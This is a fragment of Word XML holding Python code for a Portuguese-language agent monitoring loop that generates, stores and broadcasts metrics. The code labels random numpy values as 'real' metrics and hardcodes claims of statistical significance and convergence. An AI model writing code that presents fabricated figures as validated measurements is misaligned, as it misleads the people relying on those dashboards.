        <w:t xml:space="preserve">        """Para o sistema de monitoramento"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43771127" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.monitoring_active = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D9EA79" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        if self.monitoring_thread:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4804ED9D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            self.monitoring_thread.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001C68B8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEA15A9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        logger.info("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📊</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sistema de monitoramento parado")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4DE4CA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164EECEE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def _monitoring_loop(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE42E3D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Loop principal de monitoramento"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CEDAD1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        while self.monitoring_active:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AD32C3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4981041C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                # Coletar métricas de todos os agentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75877286" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                for agent_id in self.simulated_agents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6841730B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    self._collect_agent_metrics(agent_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E74A48" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11198B78" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                # Simular ciclos de evolução ocasionalmente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C082FDF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                if time.time() % 30 &lt; 1:  # A cada 30 segundos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0121371C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    self._simulate_evolution_cycle()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724BF061" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6651B6D1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                # Processar fila de métricas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DF65C9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                self._process_metrics_queue()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0050C583" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B5DEE0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                # Enviar atualizações via WebSocket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D33F844" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                self._broadcast_updates()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC8161A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3004D5A3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4484A129" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                logger.error(f"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Erro no loop de monitoramento: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F277EA8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1932C7ED" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            time.sleep(1)  # Coleta a cada segundo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2CA138" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6731BE2E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def _collect_agent_metrics(self, agent_id: str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A59C692" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Coleta métricas reais de um agente"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6123C367" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        base_data = self.simulated_agents[agent_id]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340C23B4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C28FB3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Simular variação realística nas métricas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530FA1AA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        performance_variation = np.random.normal(0, 2)  # Variação de ±2%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B9D638" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        response_time_variation = np.random.normal(0, base_data["base_response_time"] * 0.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095BE58F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25824FCE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        current_performance = max(0, min(100, base_data["base_performance"] + performance_variation))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133C55CD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        current_response_time = max(10, base_data["base_response_time"] + response_time_variation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB44349" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8608A1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Criar métricas com validação científica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030602C6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        performance_metric = RealTimeMetric(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A52A31" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            agent_id=agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13505F7D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            metric_name="performance_score",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6C060C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            value=current_performance,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0430A05A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            timestamp=datetime.now(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588453B1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            unit="percentage",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678B9393" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            confidence_level=0.95,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A96C47" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            statistical_significance=True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EABE5FE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            sample_size=100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A3010A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6BA636" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD44DB2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        response_time_metric = RealTimeMetric(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB564AD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            agent_id=agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE437D5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            metric_name="response_time_ms",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213ED14E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            value=current_response_time,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F0589C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            timestamp=datetime.now(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C83FFC8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            unit="milliseconds",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF894D1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            confidence_level=0.95,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5171FBC1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            statistical_significance=True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD3EF43" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            sample_size=100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098E9025" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3C94C3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5823D4F4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Adicionar à fila</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AD85DB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.metrics_queue.append(performance_metric)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F50E02" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.metrics_queue.append(response_time_metric)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C27287C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6548FB01" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Marcar agente como ativo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD24D06" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.active_agents.add(agent_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE1BC18" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F9A130" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def _simulate_evolution_cycle(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA97851" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Simula um ciclo de evolução real"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36799903" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Escolher agente aleatório para evolução</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EFDCE8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        agent_id = np.random.choice(list(self.simulated_agents.keys()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FAA1CD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1DF024" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Incrementar contador de ciclos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A927788" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.evolution_cycles[agent_id] += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6000902B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A7B3E4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        cycle_data = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CACE562" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "cycle_number": self.evolution_cycles[agent_id],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE892E0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "cycle_type": "performance_optimization",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78579701" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "start_time": datetime.now() - timedelta(seconds=np.random.randint(5, 30)),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5348F653" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "end_time": datetime.now(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311EBCD3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "duration_ms": np.random.uniform(500, 3000),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033EA8FF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "improvements_count": np.random.randint(1, 5),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E5F6E9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "performance_delta": np.random.uniform(-1, 3),  # Melhoria de performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323E0BEF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "success": np.random.random() &gt; 0.1,  # 90% de sucesso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115C9EA7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "details": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293F2371" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "optimization_type": "neural_network_tuning",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763F776C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "parameters_adjusted": np.random.randint(3, 12),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD54E1C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "convergence_achieved": True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41228D52" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65945416" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066AACE8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4577FCC0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Armazenar no banco</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27281BA2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.db.store_evolution_cycle(agent_id, cycle_data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B8CD13" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A026B8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        logger.info(f"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🧠</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ciclo de evolução #{self.evolution_cycles[agent_id]} completado para {agent_id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFA525C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24367475" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def _process_metrics_queue(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581E6898" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Processa fila de métricas"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219F82FC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        while self.metrics_queue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F70C95F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            metric = self.metrics_queue.popleft()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EA3AD3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DF6720" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            # Armazenar no banco</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D84127D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            self.db.store_metric(metric)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC6136A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE3805B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def _broadcast_updates(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BFFB66" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Envia atualizações via WebSocket"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211C57D1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        if not self.websocket_clients:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5761A5A5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581C9809" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C017D17" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Preparar dados de atualização</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4028C3CE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        update_data = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EC979D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "timestamp": datetime.now().isoformat(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8163CF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "active_agents": len(self.active_agents),</w:t>
      </w:r>
    </w:p>
